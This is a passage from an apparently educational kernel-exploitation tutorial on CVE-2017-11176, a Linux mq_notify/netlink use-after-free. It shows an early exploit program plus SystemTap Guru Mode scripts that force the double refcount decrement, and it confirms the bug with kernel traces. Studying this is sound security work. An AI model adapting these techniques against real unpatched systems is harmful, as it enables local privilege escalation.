It is recommended to use a Makefile to ease the exploit development (build-and-run scripts are always handy). In order to compile it, you will need to link the binary with the -lrt flags that is required to use mq_notify (from the 'man'). In addition, it is recommenced to use the -O0 option to prevent gcc from re-ordering our code (it can lead to hard-to-debug bugs).
-={ CVE-2017-11176 Exploit }=-
mqnotify: Bad file descriptor
exploit failed!
Alright, mq_notify returned "Bad file descriptor" which is equivalent to "-EBADF". There are three places where this error is emitted. It could be one of the fget() calls, or the later (filp->f_op != &mqueue_file_operations) check. Let's figure it out!
During early stage of exploit development, it is highly recommended to run the exploit in a kernel with debug symbols, it allows to use SystemTap! SystemTap is a great tool to live probe the kernel without going into gdb. It makes sequence visualization easy.
Let's start with basic System Tap (stap) scripts:
# mq_notify.stp
probe syscall.mq_notify
{
if (execname() == "exploit")
{
printf("\n\n(%d-%d) >>> mq_notify (%s)\n", pid(), tid(), argstr)
}
}
probe syscall.mq_notify.return
{
if (execname() == "exploit")
{
printf("(%d-%d) <<< mq_notify = %x\n\n\n", pid(), tid(), $return)
}
}
The previous script installs two probes that will be respectively called before and after the syscall invocation.
Dumping both the pid() and tid() helps a lot while debugging multiple threads. In addition, using the (execname() == "exploit") clause allows to limit the output.
WARNING: If there is too much output, systemtap might silently discard some lines!
Now run the script with...
...and launch the exploit:
(14427-14427) >>> mq_notify (-1, 0x7ffdd7421400)
(14427-14427) <<< mq_notify = fffffffffffffff7
Alright, the probes seem to work. We can see that both arguments of the mq_notify() syscall somehow match our own call (i.e. we set "-1" in the first parameter and 0x7ffdd7421400 looks like a userland address). It also returned fffffffffffffff7, that is -EBADF (=-9). Let's add some more probes.
Unlike syscall hooks (function starting with "SYSCALL_DEFINE*"), normal kernel functions can be hooked with the following syntax:
probe kernel.function ("fget")
{
if (execname() == "exploit")
{
printf("(%d-%d) [vfs] ==>> fget (%s)\n", pid(), tid(), $$parms)
}
}
WARNING: For some reason, not all kernel functions are hookable. For instance "inlined" might or might not be hookable (it depends if the inlining actually occurred). In addition, some functions (e.g. copy_from_user() here) can have a hook before the call but not after (i.e. while returning). In any case, System Tap will notify you and refuses to launch the script.
Let's add a probe to every function invoked in mq_notify() to see the code flowing and re-run the exploit:
(17850-17850) [SYSCALL] ==>> mq_notify (-1, 0x7ffc30916f50)
(17850-17850) [uland] ==>> copy_from_user ()
(17850-17850) [skb] ==>> alloc_skb (priority=0xd0 size=0x20)
(17850-17850) [uland] ==>> copy_from_user ()
(17850-17850) [skb] ==>> skb_put (skb=0xffff88002e061200 len=0x20)
(17850-17850) [skb] <<== skb_put = ffff88000a187600
(17850-17850) [vfs] ==>> fget (fd=0x3)
(17850-17850) [vfs] <<== fget = ffff88002e271280
(17850-17850) [netlink] ==>> netlink_getsockbyfilp (filp=0xffff88002e271280)
(17850-17850) [netlink] <<== netlink_getsockbyfilp = ffff88002ff82800
(17850-17850) [netlink] ==>> netlink_attachskb (sk=0xffff88002ff82800 skb=0xffff88002e061200 timeo=0xffff88002e1f3f40 ssk=0x0)
(17850-17850) [netlink] <<== netlink_attachskb = 0
(17850-17850) [vfs] ==>> fget (fd=0xffffffff)
(17850-17850) [vfs] <<== fget = 0
(17850-17850) [netlink] ==>> netlink_detachskb (sk=0xffff88002ff82800 skb=0xffff88002e061200)
(17850-17850) [netlink] <<== netlink_detachskb
(17850-17850) [SYSCALL] <<== mq_notify= -9
UPDATE(2018-10-22): On the suggested ISO, the syscall code invokes fdget() instead of fget(). Read the code and modify your probes accordingly.
It seems that we correctly reach the retry path since we have the following sequence:
Hmm... something is already wrong... We did not provide any file descriptor in notification.sigev_signo, it is supposed to be zero (not 3):
// initialize the sigevent structure
memset(&sigev, 0, sizeof(sigev));
sigev.sigev_notify = SIGEV_THREAD;
sigev.sigev_value.sival_ptr = sival_buffer;
Nevertheless, the first call to fget() didn't fail. In addition both netlink_getsockbyfilp() and netlink_attachskb() worked! That is also odd since we didn't create any AF_NETLINK socket.
This is the second fget() that actually failed because we set "-1" (0xffffffff) in the first argument of mq_notify(). So, what's wrong?
Let's pull back and print our sigevent pointer, and compare it with the value passed to the syscall:
printf("sigev = 0x%p\n", &sigev);
if (mq_notify((mqd_t) -1, &sigev))
-={ CVE-2017-11176 Exploit }=-
sigev = 0x0x7ffdd9257f00 // <------
mq_notify: Bad file descriptor
exploit failed!
(18652-18652) [SYSCALL] ==>> mq_notify (-1, 0x7ffdd9257e60)
Obviously, the structure passed to the syscall mq_notify is not the same we provided in our exploit. It means that either system tap is bugged (that is possible) or...
...we've just been screwed by some library wrapper!
Let's fix this and invoke mq_notify through the syscall() syscall.
First add the following headers, as well as our own wrapper:
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/syscall.h>
#define _mq_notify(mqdes, sevp) syscall(__NR_mq_notify, mqdes, sevp)
Also, remember to remove that "-lrt" line in the Makefile (we now use the syscall directly).
Explicitly set sigev_signo to '-1' since 0 is actually a valid file descriptor, and uses the wrapper:
int main(void)
{
// ... cut ...
sigev.sigev_signo = -1;
printf("sigev = 0x%p\n", &sigev);
if (_mq_notify((mqd_t)-1, &sigev))
// ... cut ...
}
And run it:
-={ CVE-2017-11176 Exploit }=-
sigev = 0x0x7fffb7eab660
mq_notify: Bad file descriptor
exploit failed!
(18771-18771) [SYSCALL] ==>> mq_notify (-1, 0x7fffb7eab660) // <--- as expected!
(18771-18771) [uland] ==>> copy_from_user ()
(18771-18771) [skb] ==>> alloc_skb (priority=0xd0 size=0x20)
(18771-18771) [uland] ==>> copy_from_user ()
(18771-18771) [skb] ==>> skb_put (skb=0xffff88003d2e95c0 len=0x20)
(18771-18771) [skb] <<== skb_put = ffff88000a0a2200
(18771-18771) [vfs] ==>> fget (fd=0xffffffff) // <---- that's better!
(18771-18771) [vfs] <<== fget = 0
(18771-18771) [SYSCALL] <<== mq_notify= -9
This time, we directly go into the out label after the first failed fget() (as expected).
So far, we know that we can reach the "retry" label (at least once) without being stopped by any security check. A common trap has been exposed (caused by library wrapper instead of syscall), and we saw how to fix it. In order to avoid the same kind of bug in the future, we will wrap every syscall.
Let's move on and trigger the bug with the help of System Tap.
Sometimes you quickly want to validate an idea without unrolling all the kernel code. In this section, we will use System Tap Guru Mode to modify kernel data structures and force a particular kernel path.
In other words, we will trigger the bug from kernel-land. The idea is that if we can't even trigger it from kernel-land, there is no way we can do it from user-land. So, let's satisfy every requirement first by modifying the kernel, and then implement them one-by-one in userland (cf. part 2).
As a reminder, we can trigger the bug if:
In the previous section, we showed that it is required that netlink_attachskb() returns 1 to trigger the bug. However, there are several requirements before reaching it:
That is, we should pass all checks gracefully:
retry:
[0] filp = fget(notification.sigev_signo);
if (!filp) {
ret = -EBADF;
goto out;
}
[1] sock = netlink_getsockbyfilp(filp);
fput(filp);
if (IS_ERR(sock)) {
ret = PTR_ERR(sock);
sock = NULL;
goto out;
}
Passing the first check [0] is easy, just provide a valid file descriptor (with open(), socket(), whatever). Nevertheless, it is better to directly use the proper type otherwise the second check [1] will fail:
struct sock *netlink_getsockbyfilp(struct file *filp)
{
struct inode *inode = filp->f_path.dentry->d_inode;
struct sock *sock;
if (!S_ISSOCK(inode->i_mode)) // <--- this need to be a socket...
return ERR_PTR(-ENOTSOCK);
sock = SOCKET_I(inode)->sk;
if (sock->sk_family != AF_NETLINK) // <--- ...from the AF_NETLINK family
return ERR_PTR(-EINVAL);
sock_hold(sock);
return sock;
}
The exploit code becomes (remember to wrap the syscall socket()):
/*
* CVE-2017-11176 Exploit.
*/
#define _GNU_SOURCE
#include <mqueue.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#define NOTIFY_COOKIE_LEN (32)
#define _mq_notify(mqdes, sevp) syscall(__NR_mq_notify, mqdes, sevp)
#define _socket(domain, type, protocol) syscall(__NR_socket, domain, type, protocol)
int main(void)
{
struct sigevent sigev;
char sival_buffer[NOTIFY_COOKIE_LEN];
int sock_fd;
printf("-={ CVE-2017-11176 Exploit }=-\n");
if ((sock_fd = _socket(AF_NETLINK, SOCK_DGRAM, NETLINK_GENERIC)) < 0)
{
perror("socket");
goto fail;
}
printf("netlink socket created = %d\n", sock_fd);
// initialize the sigevent structure
memset(&sigev, 0, sizeof(sigev));
sigev.sigev_notify = SIGEV_THREAD;
sigev.sigev_value.sival_ptr = sival_buffer;
sigev.sigev_signo = sock_fd; // <--- not '-1' anymore
if (_mq_notify((mqd_t)-1, &sigev))
{
perror("mq_notify");
goto fail;
}
printf("mq_notify succeed\n");
// TODO: exploit
return 0;
fail:
printf("exploit failed!\n");
return -1;
}
Let's run it:
-={ CVE-2017-11176 Exploit }=-
netlink socket created = 3
mq_notify: Bad file descriptor
exploit failed!
(18998-18998) [SYSCALL] ==>> mq_notify (-1, 0x7ffce9cf2180)
(18998-18998) [uland] ==>> copy_from_user ()
(18998-18998) [skb] ==>> alloc_skb (priority=0xd0 size=0x20)
(18998-18998) [uland] ==>> copy_from_user ()
(18998-18998) [skb] ==>> skb_put (skb=0xffff88003d1e0480 len=0x20)
(18998-18998) [skb] <<== skb_put = ffff88000a0a2800
(18998-18998) [vfs] ==>> fget (fd=0x3) // <--- this time '3' is expected
(18998-18998) [vfs] <<== fget = ffff88003cf14d80 // PASSED
(18998-18998) [netlink] ==>> netlink_getsockbyfilp (filp=0xffff88003cf14d80)
(18998-18998) [netlink] <<== netlink_getsockbyfilp = ffff88002ff60000 // PASSED
(18998-18998) [netlink] ==>> netlink_attachskb (sk=0xffff88002ff60000 skb=0xffff88003d1e0480 timeo=0xffff88003df8ff40 ssk=0x0)
(18998-18998) [netlink] <<== netlink_attachskb = 0 // UNWANTED BEHAVIOR
(18998-18998) [vfs] ==>> fget (fd=0xffffffff)
(18998-18998) [vfs] <<== fget = 0
(18998-18998) [netlink] ==>> netlink_detachskb (sk=0xffff88002ff60000 skb=0xffff88003d1e0480)
(18998-18998) [netlink] <<== netlink_detachskb
(18998-18998) [SYSCALL] <<== mq_notify= -9
It really looks like the first buggy stap trace, the difference here is that we actually control every data (file descriptor, sigev), nothing is hidden behind a library. Since neither the first fget() nor netlink_getsockbyfilp() returned NULL, we can safely assume that we passed both checks.
With the previous code, we reached netlink_attachskb() which returned 0. It means we went into the "normal" path. We don't want this behavior, we want to get into the "retry" path (returns 1). So, let's get back to the kernel code:
int netlink_attachskb(struct sock *sk, struct sk_buff *skb,
long *timeo, struct sock *ssk)
{
struct netlink_sock *nlk;
nlk = nlk_sk(sk);
[0] if (atomic_read(&sk->sk_rmem_alloc) > sk->sk_rcvbuf || test_bit(0, &nlk->state)) {
DECLARE_WAITQUEUE(wait, current);
if (!*timeo) {
// ... cut (never reached in our code path) ...
}
__set_current_state(TASK_INTERRUPTIBLE);
add_wait_queue(&nlk->wait, &wait);
if ((atomic_read(&sk->sk_rmem_alloc) > sk->sk_rcvbuf || test_bit(0, &nlk->state)) &&
!sock_flag(sk, SOCK_DEAD))
*timeo = schedule_timeout(*timeo);
__set_current_state(TASK_RUNNING);
remove_wait_queue(&nlk->wait, &wait);
sock_put(sk);
if (signal_pending(current)) {
kfree_skb(skb);
return sock_intr_errno(*timeo);
}
return 1; // <---- the only way
}
skb_set_owner_r(skb, sk);
return 0;
}
The only way to have netlink_attachskb() returning "1" requires that we first pass the check [0]:
if (atomic_read(&sk->sk_rmem_alloc) > sk->sk_rcvbuf || test_bit(0, &nlk->state))
It is time to unleash the true power of System Tap and enter: the Guru Mode! The Guru Mode allows to write embedded "C" code that can be called by our probes. It is like writing kernel code directly that will be injected at runtime, much like a Linux Kernel Module (LKM). Because of this, any programming error here will make the kernel crash! You are now a kernel developer :-).
What we will do here, is to modify either the struct sock "sk" and/or struct netlink_sock "nlk" data structures, so the condition becomes true. However, before doing it, let's grab some useful information about the current struct sock sk state.
Let's modify the netlink_attachskb() probe and add some "embedded" C code (the "%{" and "%}" parts).
%{
#include <net/sock.h>
#include <net/netlink_sock.h>
%}
function dump_netlink_sock:long (arg_sock:long)
%{
struct sock *sk = (void*) STAP_ARG_arg_sock;
struct netlink_sock *nlk = (void*) sk;
_stp_printf("-={ dump_netlink_sock: %p }=-\n", nlk);
_stp_printf("- sk = %p\n", sk);
_stp_printf("- sk->sk_rmem_alloc = %d\n", sk->sk_rmem_alloc);
_stp_printf("- sk->sk_rcvbuf = %d\n", sk->sk_rcvbuf);
_stp_printf("- sk->sk_refcnt = %d\n", sk->sk_refcnt);
_stp_printf("- nlk->state = %x\n", (nlk->state & 0x1));
_stp_printf("-={ dump_netlink_sock: END}=-\n");
%}
probe kernel.function ("netlink_attachskb")
{
if (execname() == "exploit")
{
printf("(%d-%d) [netlink] ==>> netlink_attachskb (%s)\n", pid(), tid(), $$parms)
dump_netlink_sock($sk);
}
}
WARNING: Again, the code here runs in kernel-land, any error will make the kernel crash.
Run system tap with the -g (i.e. guru) modifier:
-={ CVE-2017-11176 Exploit }=-
netlink socket created = 3
mq_notify: Bad file descriptor
exploit failed!
(19681-19681) [SYSCALL] ==>> mq_notify (-1, 0x7ffebaa7e720)
(19681-19681) [uland] ==>> copy_from_user ()
(19681-19681) [skb] ==>> alloc_skb (priority=0xd0 size=0x20)
(19681-19681) [uland] ==>> copy_from_user ()
(19681-19681) [skb] ==>> skb_put (skb=0xffff88003d1e05c0 len=0x20)
(19681-19681) [skb] <<== skb_put = ffff88000a0a2200
(19681-19681) [vfs] ==>> fget (fd=0x3)
(19681-19681) [vfs] <<== fget = ffff88003d0d5680
(19681-19681) [netlink] ==>> netlink_getsockbyfilp (filp=0xffff88003d0d5680)
(19681-19681) [netlink] <<== netlink_getsockbyfilp = ffff880036256800
(19681-19681) [netlink] ==>> netlink_attachskb (sk=0xffff880036256800 skb=0xffff88003d1e05c0 timeo=0xffff88003df5bf40 ssk=0x0)
-={ dump_netlink_sock: 0xffff880036256800 }=-
- sk = 0xffff880036256800
- sk->sk_rmem_alloc = 0 // <-----
- sk->sk_rcvbuf = 133120 // <-----
- sk->sk_refcnt = 2
- nlk->state = 0 // <-----
-={ dump_netlink_sock: END}=-
(19681-19681) [netlink] <<== netlink_attachskb = 0
(19681-19681) [vfs] ==>> fget (fd=0xffffffff)
(19681-19681) [vfs] <<== fget = 0
(19681-19681) [netlink] ==>> netlink_detachskb (sk=0xffff880036256800 skb=0xffff88003d1e05c0)
(19681-19681) [netlink] <<== netlink_detachskb
(19681-19681) [SYSCALL] <<== mq_notify= -9
The embedded stap function dump_netlink_sock() is correctly called before entering netlink_attachskb(). As we can see, the first bit of state is not set, and sk_rmem_alloc is lesser than sk_rcvbuf... so we don't pass the check.
Let's modify nlk->state before calling netlink_attachskb():
function dump_netlink_sock:long (arg_sock:long)
%{
struct sock *sk = (void*) STAP_ARG_arg_sock;
struct netlink_sock *nlk = (void*) sk;
_stp_printf("-={ dump_netlink_sock: %p }=-\n", nlk);
_stp_printf("- sk = %p\n", sk);
_stp_printf("- sk->sk_rmem_alloc = %d\n", sk->sk_rmem_alloc);
_stp_printf("- sk->sk_rcvbuf = %d\n", sk->sk_rcvbuf);
_stp_printf("- sk->sk_refcnt = %d\n", sk->sk_refcnt);
_stp_printf("- (before) nlk->state = %x\n", (nlk->state & 0x1));
nlk->state |= 1; // <-----
_stp_printf("- (after) nlk->state = %x\n", (nlk->state & 0x1));
_stp_printf("-={ dump_netlink_sock: END}=-\n");
%}
And run it:
-={ CVE-2017-11176 Exploit }=-
netlink socket created = 3
<<< HIT CTRL-C HERE >>>
^Cmake: *** [check] Interrupt
(20002-20002) [SYSCALL] ==>> mq_notify (-1, 0x7ffc48bed2c0)
(20002-20002) [uland] ==>> copy_from_user ()
(20002-20002) [skb] ==>> alloc_skb (priority=0xd0 size=0x20)
(20002-20002) [uland] ==>> copy_from_user ()
(20002-20002) [skb] ==>> skb_put (skb=0xffff88003d3a6080 len=0x20)
(20002-20002) [skb] <<== skb_put = ffff88002e142600
(20002-20002) [vfs] ==>> fget (fd=0x3)
(20002-20002) [vfs] <<== fget = ffff88003ddd8380
(20002-20002) [netlink] ==>> netlink_getsockbyfilp (filp=0xffff88003ddd8380)
(20002-20002) [netlink] <<== netlink_getsockbyfilp = ffff88003dde0400
(20002-20002) [netlink] ==>> netlink_attachskb (sk=0xffff88003dde0400 skb=0xffff88003d3a6080 timeo=0xffff88002e233f40 ssk=0x0)
-={ dump_netlink_sock: 0xffff88003dde0400 }=-
- sk = 0xffff88003dde0400
- sk->sk_rmem_alloc = 0
- sk->sk_rcvbuf = 133120
- sk->sk_refcnt = 2
- (before) nlk->state = 0
- (after) nlk->state = 1
-={ dump_netlink_sock: END}=-
<<< HIT CTRL-C HERE >>>
(20002-20002) [netlink] <<== netlink_attachskb = fffffffffffffe00 // <-----
(20002-20002) [SYSCALL] <<== mq_notify= -512
Woops! The call to mq_notify() became blocking (i.e. the main exploit thread is stuck in kernel-land, inside the syscall). Fortunately, we can get the control back with CTRL-C.
Note that this time, netlink_attachskb() returned 0xfffffffffffffe00, that is "-ERESTARTSYS" errno. In other words, we got into that path:
if (signal_pending(current)) {
kfree_skb(skb);
return sock_intr_errno(*timeo); // <---- return -ERESTARTSYS
}
It means that we actually reached the other path of netlink_attachskb(), mission succeed!
The reason why mq_notify() blocked is:
__set_current_state(TASK_INTERRUPTIBLE);
if ((atomic_read(&sk->sk_rmem_alloc) > sk->sk_rcvbuf || test_bit(0, &nlk->state)) &&
!sock_flag(sk, SOCK_DEAD))
*timeo = schedule_timeout(*timeo);
__set_current_state(TASK_RUNNING);
We will get in deeper details with scheduling later (cf. part 2) but for now just consider that our task is stopped until a special condition is met (it's all about wait queue).
Maybe we could avoid being scheduled/blocked? In order to do so, we need to by-pass the call to schedule_timeout(). Let's mark the sock as "SOCK_DEAD" (the last part of the condition). That is, change the "sk" content (just like we did before), to make the following function sock_flag() return true:
// from [include/net/sock.h]
static inline bool sock_flag(const struct sock *sk, enum sock_flags flag)
{
return test_bit(flag, &sk->sk_flags);
}
enum sock_flags {
SOCK_DEAD, // <---- this has to be '0', but we can check it with stap!
... cut ...
}
Let's edit the probe again:
// mark it congested!
_stp_printf("- (before) nlk->state = %x\n", (nlk->state & 0x1));
nlk->state |= 1;
_stp_printf("- (after) nlk->state = %x\n", (nlk->state & 0x1));
// mark it DEAD
_stp_printf("- sk->sk_flags = %x\n", sk->sk_flags);
_stp_printf("- SOCK_DEAD = %x\n", SOCK_DEAD);
sk->sk_flags |= (1 << SOCK_DEAD);
_stp_printf("- sk->sk_flags = %x\n", sk->sk_flags);
Relaunch annnnnnnnd.........boom! Our exploit main thread is now stuck in an infinite loop inside the kernel. The reason is:
So, we effectively by-passed the call to schedule_timeout() that made us blocked, but we created an infinite loop while doing it.
Let's continue the hack so fget() will fail on the second call! One way to do this, is to basically remove our file descriptor directly from the FDT (i.e. set it to NULL):
%{
#include <linux/fdtable.h>
%}
function remove_fd3_from_fdt:long (arg_unused:long)
%{
_stp_printf("!!>>> REMOVING FD=3 FROM FDT <<<!!\n");
struct files_struct *files = current->files;
struct fdtable *fdt = files_fdtable(files);
fdt->fd[3] = NULL;
%}
probe kernel.function ("netlink_attachskb")
{
if (execname() == "exploit")
{
printf("(%d-%d) [netlink] ==>> netlink_attachskb (%s)\n", pid(), tid(), $$parms)
dump_netlink_sock($sk); // it also marks the socket as DEAD and CONGESTED
remove_fd3_from_fdt(0);
}
}
-={ CVE-2017-11176 Exploit }=-
netlink socket created = 3
mq_notify: Bad file descriptor
exploit failed!
(3095-3095) [SYSCALL] ==>> mq_notify (-1, 0x7ffe5e528760)
(3095-3095) [uland] ==>> copy_from_user ()
(3095-3095) [skb] ==>> alloc_skb (priority=0xd0 size=0x20)
(3095-3095) [uland] ==>> copy_from_user ()
(3095-3095) [skb] ==>> skb_put (skb=0xffff88003f02cd00 len=0x20)
(3095-3095) [skb] <<== skb_put = ffff88003144ac00
(3095-3095) [vfs] ==>> fget (fd=0x3)
(3095-3095) [vfs] <<== fget = ffff880031475480
(3095-3095) [netlink] ==>> netlink_getsockbyfilp (filp=0xffff880031475480)
(3095-3095) [netlink] <<== netlink_getsockbyfilp = ffff88003cf56800
(3095-3095) [netlink] ==>> netlink_attachskb (sk=0xffff88003cf56800 skb=0xffff88003f02cd00 timeo=0xffff88002d79ff40 ssk=0x0)
-={ dump_netlink_sock: 0xffff88003cf56800 }=-
- sk = 0xffff88003cf56800
- sk->sk_rmem_alloc = 0
- sk->sk_rcvbuf = 133120
- sk->sk_refcnt = 2
- (before) nlk->state = 0
- (after) nlk->state = 1
- sk->sk_flags = 100
- SOCK_DEAD = 0
- sk->sk_flags = 101
-={ dump_netlink_sock: END}=-
!!>>> REMOVING FD=3 FROM FDT <<<!!
(3095-3095) [netlink] <<== netlink_attachskb = 1 // <-----
(3095-3095) [vfs] ==>> fget (fd=0x3)
(3095-3095) [vfs] <<== fget = 0 // <-----
(3095-3095) [netlink] ==>> netlink_detachskb (sk=0xffff88003cf56800 skb=0xffff88003f02cd00)
(3095-3095) [netlink] <<== netlink_detachskb
(3095-3095) [SYSCALL] <<== mq_notify= -9
Very nice, the kernel goes out of the infinite loop we introduced. In addition, we are getting closer and closer to our attack scenario:
So... Did we trigger the bug?
Since everything went according to our plan, the bug should be triggered and the sock refcounter should be decreased twice. Let's check it.
During exit probe, it is not possible to retrieve the parameters of the enter probe. It means that we can't check the content of sock while returning from netlink_attachskb().
One way to do this is to store the sock pointer returned by netlink_getsockbyfilp() in a global variable (sock_ptr in the script). Then dump its content using our embedded "C" code with dump_netlink_sock():
global sock_ptr = 0; // <------ declared globally!
probe syscall.mq_notify.return
{
if (execname() == "exploit")
{
if (sock_ptr != 0) // <----- watch your NULL-deref, this is kernel-land!
{
dump_netlink_sock(sock_ptr);
sock_ptr = 0;
}
printf("(%d-%d) [SYSCALL] <<== mq_notify= %d\n\n", pid(), tid(), $return)
}
}
probe kernel.function ("netlink_getsockbyfilp").return
{
if (execname() == "exploit")
{
printf("(%d-%d) [netlink] <<== netlink_getsockbyfilp = %x\n", pid(), tid(), $return)
sock_ptr = $return; // <----- store it
}
}
Run it again!
(3391-3391) [SYSCALL] ==>> mq_notify (-1, 0x7ffe8f78c840)
(3391-3391) [uland] ==>> copy_from_user ()
(3391-3391) [skb] ==>> alloc_skb (priority=0xd0 size=0x20)
(3391-3391) [uland] ==>> copy_from_user ()
(3391-3391) [skb] ==>> skb_put (skb=0xffff88003d20cd00 len=0x20)
(3391-3391) [skb] <<== skb_put = ffff88003df9dc00
(3391-3391) [vfs] ==>> fget (fd=0x3)
(3391-3391) [vfs] <<== fget = ffff88003d84ed80
(3391-3391) [netlink] ==>> netlink_getsockbyfilp (filp=0xffff88003d84ed80)
(3391-3391) [netlink] <<== netlink_getsockbyfilp = ffff88002d72d800
(3391-3391) [netlink] ==>> netlink_attachskb (sk=0xffff88002d72d800 skb=0xffff88003d20cd00 timeo=0xffff8800317a7f40 ssk=0x0)
-={ dump_netlink_sock: 0xffff88002d72d800 }=-
- sk = 0xffff88002d72d800
- sk->sk_rmem_alloc = 0
- sk->sk_rcvbuf = 133120
- sk->sk_refcnt = 2 // <------------
- (before) nlk->state = 0
- (after) nlk->state = 1
- sk->sk_flags = 100
- SOCK_DEAD = 0
- sk->sk_flags = 101
-={ dump_netlink_sock: END}=-
!!>>> REMOVING FD=3 FROM FDT <<<!!
(3391-3391) [netlink] <<== netlink_attachskb = 1
(3391-3391) [vfs] ==>> fget (fd=0x3)
(3391-3391) [vfs] <<== fget = 0
(3391-3391) [netlink] ==>> netlink_detachskb (sk=0xffff88002d72d800 skb=0xffff88003d20cd00)
(3391-3391) [netlink] <<== netlink_detachskb
-={ dump_netlink_sock: 0xffff88002d72d800 }=-
- sk = 0xffff88002d72d800
- sk->sk_rmem_alloc = 0
- sk->sk_rcvbuf = 133120
- sk->sk_refcnt = 0 // <-------------
- (before) nlk->state = 1
- (after) nlk->state = 1
- sk->sk_flags = 101
- SOCK_DEAD = 0
- sk->sk_flags = 101
-={ dump_netlink_sock: END}=-
(3391-3391) [SYSCALL] <<== mq_notify= -9
As we can see, the sk->sk_refcnt has been decreased twice! We successfully triggered the bug.
Because the sock's refcounter reaches zero, it means the struct netlink_sock object will be free. Let's add some other probes:
... cut ...
(13560-13560) [netlink] <<== netlink_attachskb = 1
(13560-13560) [vfs] ==>> fget (fd=0x3)
(13560-13560) [vfs] <<== fget = 0
(13560-13560) [netlink] ==>> netlink_detachskb (sk=0xffff88002d7e5c00 skb=0xffff88003d2c1440)
(13560-13560) [kmem] ==>> kfree (objp=0xffff880033fd0000)
(13560-13560) [kmem] <<== kfree =
(13560-13560) [sk] ==>> sk_free (sk=0xffff88002d7e5c00)
(13560-13560) [sk] ==>> __sk_free (sk=0xffff88002d7e5c00)
(13560-13560) [kmem] ==>> kfree (objp=0xffff88002d7e5c00) // <---- freeing "sock"
(13560-13560) [kmem] <<== kfree =
(13560-13560) [sk] <<== __sk_free =
(13560-13560) [sk] <<== sk_free =
(13560-13560) [netlink] <<== netlink_detachskb
The sock object is freed but we don't see any use-after-free...
Unlike our original plan, the netlink_sock object is freed by netlink_detachskb(). The reason is we don't call close() (we only reset the FDT entry to NULL). That is, the file object is actually not released and so, it does not drop its reference of the netlink_sock object. In other words, we are missing a reference counter decrease.
It's all right, what we wanted to validate here was that the refcounter was decreased twice (one by netlink_attachskb() and one by netlink_detachskb()), which is the case.
In the normal course of operation (i.e. we call close()), this additional refcounter decrease will occur and netlink_detachskb() will do a UAF. We will even "delay" this use-after-free to a later moment to get a better control (cf. part 2).
In the end, the whole system tap script that triggers the bug from kernel-land can be simplified into this:
# mq_notify_force_crash.stp
#
# Run it with "stap -v -g ./mq_notify_force_crash.stp" (guru mode)
%{
#include <net/sock.h>
#include <net/netlink_sock.h>
#include <linux/fdtable.h>
%}
function force_trigger:long (arg_sock:long)
%{
struct sock *sk = (void*) STAP_ARG_arg_sock;
sk->sk_flags |= (1 << SOCK_DEAD); // avoid blocking the thread
struct netlink_sock *nlk = (void*) sk;
nlk->state |= 1; // enter the netlink_attachskb() retry path
struct files_struct *files = current->files;
struct fdtable *fdt = files_fdtable(files);
fdt->fd[3] = NULL; // makes the second call to fget() fails
%}
probe kernel.function ("netlink_attachskb")
{
if (execname() == "exploit")
{
force_trigger($sk);
}
}
Simple, isn't it?
In this first article, the core kernel data structure, as well as, the refcounting facility has been introduced to the Linux Kernel newcomer. While studying public information (CVE description, patch), we got a better understanding of the bug and designed an attack scenario.
Then, we started developing the exploit and validated that the bug is actually reachable from an unprivileged user. Doing so, we introduced a great kernel tool: System Tap. We also encountered our first bug (library wrappers) and showed how to detect it.
With the help of System Tap's Guru Mode, we finally "forced" the trigger from the kernel-land and validated that we can reliably produce a double sock_put() bug. It exposed that three things were necessary to trigger the bug:
In the next article, we will replace, one-by-one, each kernel modification introduced with System Tap. In fact, we will gradually build a proof-of-concept code that triggers the bug using userland code only.
We hope you enjoyed the journey in kernel land exploitation and see you soon in part 2!